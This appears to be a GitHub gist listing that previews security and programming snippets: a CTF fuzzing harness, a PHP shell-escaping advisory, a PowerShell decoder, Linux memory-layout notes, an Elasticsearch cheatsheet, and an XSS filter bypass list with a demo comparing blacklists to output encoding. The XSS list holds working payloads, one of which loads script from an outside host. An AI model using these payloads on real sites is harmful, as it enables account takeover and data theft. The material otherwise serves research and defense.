Khanh Ta Quang tqkve
@sroettger
sroettger / Readme.md
Last active January 2, 2019 10:02
Set Theory (part 1) from Hack Dat Kiwi 2017 CTF.

This challenge gave parts of the points as soon as you find a crash in the binary, which was a forking network service. With a short LD_PRELOAD library, you can bypass all the networking code and fuzz the handler function directly with afl using the qemu mode.

The basic steps:

  1. find a libc function that gets called after all initialization is done and overwrite it. Alternatively: define a constructor and do the initialization yourself
  2. for position-independent executables, find the load address with dl_iterate_phdr
  3. call whatever function you want to fuzz in the binary
  4. run afl with -Q and AFL_PRELOAD
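A sketch of the harness those four steps describe, added here as an example; it is not sroettger's gist code. It assumes the target calls listen() once its initialization is finished (the interposed libc function from step 1), that the request handler sits at HANDLER_OFFSET in the executable and takes the client file descriptor as its only argument, and that afl delivers the test case on stdin. The hooked function, the offset and the handler signature are hypothetical and must come from disassembly of the real binary.

```c
// Hypothetical LD_PRELOAD harness for afl's qemu mode: interpose listen(),
// resolve the (PIE) load address with dl_iterate_phdr, and hand afl's stdin
// to the request handler over a socketpair. Example code, not from the gist;
// HANDLER_OFFSET and the handler signature are assumptions.
#define _GNU_SOURCE
#include <link.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef HANDLER_OFFSET
#define HANDLER_OFFSET 0x1234UL   /* hypothetical offset of the handler inside the target */
#endif

typedef void (*handler_fn)(int client_fd);   /* assumed handler signature */

struct exe_map {
    uintptr_t base;                 /* load bias: 0 for non-PIE, randomized for PIE */
    size_t nseg;
    uintptr_t seg_lo[16], seg_hi[16];
};

/* dl_iterate_phdr reports the main executable first: record its PT_LOAD ranges and stop. */
static int first_object_cb(struct dl_phdr_info *info, size_t size, void *data)
{
    (void)size;
    struct exe_map *m = data;
    m->base = info->dlpi_addr;
    for (int i = 0; i < info->dlpi_phnum && m->nseg < 16; i++) {
        const ElfW(Phdr) *ph = &info->dlpi_phdr[i];
        if (ph->p_type != PT_LOAD) continue;
        m->seg_lo[m->nseg] = m->base + ph->p_vaddr;
        m->seg_hi[m->nseg] = m->base + ph->p_vaddr + ph->p_memsz;
        m->nseg++;
    }
    return 1;   /* non-zero stops the iteration after the first (main) object */
}

static struct exe_map exe_layout(void)
{
    struct exe_map m = {0};
    dl_iterate_phdr(first_object_cb, &m);
    return m;
}

uintptr_t exe_base(void) { return exe_layout().base; }

/* 1 if addr lies inside a PT_LOAD segment of the main executable, else 0. */
int exe_contains(uintptr_t addr)
{
    struct exe_map m = exe_layout();
    for (size_t i = 0; i < m.nseg; i++)
        if (addr >= m.seg_lo[i] && addr < m.seg_hi[i]) return 1;
    return 0;
}

/* Write buf into one end of a socketpair and return the other end, so the handler
 * can read() the input and write() its replies as if talking to a client.
 * Both directions are bounded by the socket buffer; fine for CTF-sized inputs. */
int make_input_socket(const unsigned char *buf, size_t len)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    size_t off = 0;
    while (off < len) {
        ssize_t n = write(sv[0], buf + off, len - off);
        if (n <= 0) { close(sv[0]); close(sv[1]); return -1; }
        off += (size_t)n;
    }
    shutdown(sv[0], SHUT_WR);   /* the handler sees EOF once the input is consumed */
    return sv[1];
}

/* Interposed libc function (assumption: the target calls listen() after setup).
 * Instead of listening, read afl's test case and jump straight into the handler. */
int listen(int sockfd, int backlog)
{
    (void)sockfd; (void)backlog;
    static unsigned char in[1 << 16];
    size_t n = 0;
    while (n < sizeof in) {
        ssize_t r = read(STDIN_FILENO, in + n, sizeof in - n);
        if (r <= 0) break;
        n += (size_t)r;
    }
    int fd = make_input_socket(in, n);
    if (fd < 0) _exit(1);
    handler_fn handler = (handler_fn)(exe_base() + HANDLER_OFFSET);
    handler(fd);
    _exit(0);   /* one test case per process; afl restarts the target */
}
```

Build it as a shared object, `gcc -shared -fPIC -DHANDLER_OFFSET=0x... -o harness.so harness.c`, and start the fuzzer with `AFL_PRELOAD=./harness.so afl-fuzz -Q -i in -o out -- ./target`; AFL_PRELOAD makes afl set LD_PRELOAD for the emulated target only. If no libc call happens conveniently late, the gist's alternative applies: mark a function `__attribute__((constructor))` and perform the target's initialization there before calling the handler.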
@Zenexer
Zenexer / escapeshellrce.md
Last active August 22, 2025 13:04
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

'''
IDA plugin to display the calls and strings referenced by a function as hints.
Installation: put this file in your %IDADIR%/plugins/ directory.
Author: Willi Ballenthin <[email protected]>
Licence: Apache 2.0
'''
import idc
import idaapi
import idautils
anonymous
anonymous / psx.py
Created November 13, 2016 14:32
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
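The preview above only shows the header of psx.py. As an added example, not the gist's own code, here is a decoder that handles the layers the header lists (base64 wrapping UTF-16LE text, gzip, raw deflate) plus plain UTF-8, recursively, and peels a two-layer sample payload constructed inline for demonstration. The 40-character threshold for a base64 run and the UTF-16LE heuristic are design choices of this example.

```python
"""Added example, not the psx.py gist: peel layered PowerShell payloads.

Layers handled: base64 around UTF-16LE text (-EncodedCommand), gzip,
raw deflate (DeflateStream) and plain UTF-8, applied recursively.
The sample payload built by build_sample() is constructed here.
"""
import base64
import gzip
import re
import zlib
from typing import List, Optional

# A long run of base64 alphabet characters; 40 is an arbitrary floor that skips ordinary identifiers.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def try_base64(token: str) -> Optional[bytes]:
    """Strict base64 decode; None if the run is not valid base64."""
    try:
        return base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def looks_utf16le(data: bytes) -> bool:
    """-EncodedCommand payloads are UTF-16LE: every odd byte of ASCII text is NUL."""
    return len(data) >= 2 and len(data) % 2 == 0 and data[1::2].count(0) > len(data) // 4


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_layer(data: bytes) -> Optional[str]:
    """Turn one decoded base64 blob into text, trying the encodings PowerShell loaders use."""
    if data[:2] == b"\x1f\x8b":                          # gzip magic (GZipStream)
        try:
            return gzip.decompress(data).decode("utf-8", "replace")
        except (OSError, EOFError, zlib.error):
            return None
    if looks_utf16le(data):
        return data.decode("utf-16-le", "replace")
    try:                                                 # DeflateStream writes raw deflate, no zlib header
        return zlib.decompress(data, -15).decode("utf-8", "replace")
    except zlib.error:
        pass
    try:                                                 # [Text.Encoding]::UTF8.GetString(...) style
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if _is_text(text) else None


def decode_powershell(text: str, max_depth: int = 8) -> List[str]:
    """Return every layer recovered, outermost first; stop when no base64 run decodes to text."""
    layers = [text]
    for _ in range(max_depth):
        match = B64_RUN.search(layers[-1])
        if not match:
            break
        raw = try_base64(match.group(0))
        inner = decode_layer(raw) if raw is not None else None
        if inner is None:
            break
        layers.append(inner)
    return layers


INNER_SCRIPT = "Write-Host 'layer two reached'; Get-Process | Select-Object -First 3"


def build_sample() -> str:
    """Constructed two-layer payload: deflate+base64 stage inside a UTF-16LE -EncodedCommand."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(INNER_SCRIPT.encode()) + comp.flush()
    stage = ("$d=[Convert]::FromBase64String('%s');$s=New-Object IO.MemoryStream(,$d);"
             "IEX (New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($s,"
             "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
             % base64.b64encode(deflated).decode())
    encoded = base64.b64encode(stage.encode("utf-16-le")).decode()
    return "powershell -NoP -NonI -W Hidden -EncodedCommand " + encoded


if __name__ == "__main__":
    for depth, layer in enumerate(decode_powershell(build_sample())):
        print(f"--- layer {depth} ---\n{layer}")
```

The sample stops after three layers because the innermost script contains no base64 run long enough to match; on real samples the same stop condition fires when a layer decodes to binary that none of the handlers recognise, which is where manual analysis takes over.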
@CMCDragonkai
CMCDragonkai / memory_layout.md
Last active December 6, 2025 14:51
Linux: Understanding the Memory Layout of Linux Executables

Understanding the Memory Layout of Linux Executables

Required tools for playing around with memory:

  • hexdump
  • objdump
  • readelf
  • xxd
  • gcore
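As an added example alongside those tools (not code from CMCDragonkai's gist), the program below takes one address from each classic region of a running process, checks that they appear in the usual order, and resolves each one against /proc/self/maps, which is what a gcore dump read with readelf would show. It assumes Linux with glibc; on a system without /proc the lookup simply reports no match.

```c
// Added example, not from the gist: locate the classic regions of a running
// Linux process (text, rodata, data, bss, heap, stack) by taking one address
// from each and resolving it against /proc/self/maps.
// Assumes Linux with glibc; region_of() returns 0 where /proc is unavailable.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static const char rodata_sym[] = "read-only string";   /* .rodata */
static int data_sym = 42;                               /* .data: initialized global */
static int bss_sym;                                     /* .bss: zero-initialized global */

static int text_sym(void) { return 1; }                 /* .text */

/* Copy the /proc/self/maps line whose range contains addr into out; 1 on success. */
int region_of(uintptr_t addr, char *out, size_t cap)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps) return 0;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, maps)) {
        unsigned long lo, hi;
        if (sscanf(line, "%lx-%lx", &lo, &hi) != 2) continue;
        if (addr >= lo && addr < hi) {
            line[strcspn(line, "\n")] = '\0';
            snprintf(out, cap, "%s", line);
            found = 1;
            break;
        }
    }
    fclose(maps);
    return found;
}

/* Canonical order on Linux: text < rodata < data <= bss < heap < stack. 1 if it holds. */
int layout_is_canonical(void)
{
    void *heap = malloc(64);                             /* small request: served from the brk heap */
    volatile int local = 0;                              /* stack */
    uintptr_t text = (uintptr_t)text_sym, ro = (uintptr_t)rodata_sym;
    uintptr_t data = (uintptr_t)&data_sym, bss = (uintptr_t)&bss_sym;
    uintptr_t hp = (uintptr_t)heap, st = (uintptr_t)&local;
    int ok = text < ro && ro < data && data <= bss && bss < hp && hp < st;
    free(heap);
    return ok;
}

int main(void)
{
    void *heap = malloc(64);
    volatile int local = 0;
    struct { const char *name; uintptr_t addr; } probes[] = {
        { ".text  ", (uintptr_t)text_sym },  { ".rodata", (uintptr_t)rodata_sym },
        { ".data  ", (uintptr_t)&data_sym }, { ".bss   ", (uintptr_t)&bss_sym },
        { "heap   ", (uintptr_t)heap },      { "stack  ", (uintptr_t)&local },
    };
    char line[512];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        const char *where = region_of(probes[i].addr, line, sizeof line) ? line : "(no /proc/self/maps)";
        printf("%s %#18lx  %s\n", probes[i].name, (unsigned long)probes[i].addr, where);
    }
    printf("canonical order: %s\n", layout_is_canonical() ? "yes" : "no");
    free(heap);
    return 0;
}
```

Compile once with and once without -no-pie: the executable's regions move from the fixed 0x400000 area to a randomized 0x55... base, while the heap follows the end of .bss in both cases and the stack stays near the top of the address space. readelf -l on the binary shows the same PT_LOAD segments that the maps lines correspond to.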
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active December 5, 2025 11:24
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
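These payloads exist to defeat blacklist filters. As an added example, not part of rvrsh3ll's list, the script below runs a constructed, deliberately weak filter (strip script tags and javascript: URLs, the rule many home-grown sanitizers implement) against a handful of entries from the list above, and beside it the context-aware output encoding that leaves every one of them inert. The filter, the encoder and the inertness check are all constructed for this illustration.

```javascript
// Added example, not part of the bypass list: a blacklist filter misses most
// of these payloads, output encoding neutralizes all of them.
// naiveFilter() is a deliberately weak, constructed filter for illustration.

// A handful of entries taken from the list above.
const PAYLOADS = [
  "<marquee/onstart=alert()>",
  "<video/poster/onerror=alert()>",
  "<isindex/autofocus/onfocus=alert()>",
  '0\\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"',
  "<script/src=data:,alert()>",
  "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
  "<IMG SRC=javascript:alert('XSS')>",
];

// Constructed blacklist: drop <script> tags and javascript: URLs, nothing else.
function naiveFilter(input) {
  return input
    .replace(/<\s*\/?\s*script[^>]*>/gi, "")
    .replace(/javascript:/gi, "");
}

// Payloads the blacklist leaves byte-for-byte intact: event handlers on other
// elements never trip a rule that only knows about <script> and javascript:.
function unchangedByNaiveFilter() {
  return PAYLOADS.filter((p) => naiveFilter(p) === p);
}

// Encode for an HTML text or quoted-attribute context: every character that
// could open a tag or close the current quoted context becomes an entity.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
function encodeForHtml(s) {
  return s.replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// True when the encoded string can neither start a tag nor leave a quoted attribute.
function isInert(encoded) {
  return !/[<>"']/.test(encoded);
}

function allInertAfterEncoding() {
  return PAYLOADS.every((p) => isInert(encodeForHtml(p)));
}

for (const p of PAYLOADS) {
  console.log(naiveFilter(p) === p ? "BYPASSES blacklist:" : "caught by blacklist:", p);
}
console.log("all payloads inert after encoding:", allInertAfterEncoding());
```

The encoder above is only correct for HTML body and quoted-attribute contexts; a value placed inside a script block, a URL, or an unquoted attribute needs the encoding for that context, which is exactly the distinction a blacklist never makes.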
@stephen-puiszis
stephen-puiszis / elasticsearch-cheatsheet.txt
Last active August 23, 2025 14:22
Elasticsearch Cheatsheet - An Overview of Commonly Used Elasticsearch API Endpoints and What They Do
# Elasticsearch Cheatsheet - an overview of commonly used Elasticsearch API commands
# cat paths
/_cat/allocation
/_cat/shards
/_cat/shards/{index}
/_cat/master
/_cat/nodes
/_cat/indices
/_cat/indices/{index}
@geschke
geschke / gdrive-example.php
Created April 21, 2014 17:15
Google Drive PHP API library example to download a spreadsheet file
<?php
require_once __DIR__ . '/vendor/autoload.php';
class DriveFile
{
private $service = null;
private $client = null;
private $auth;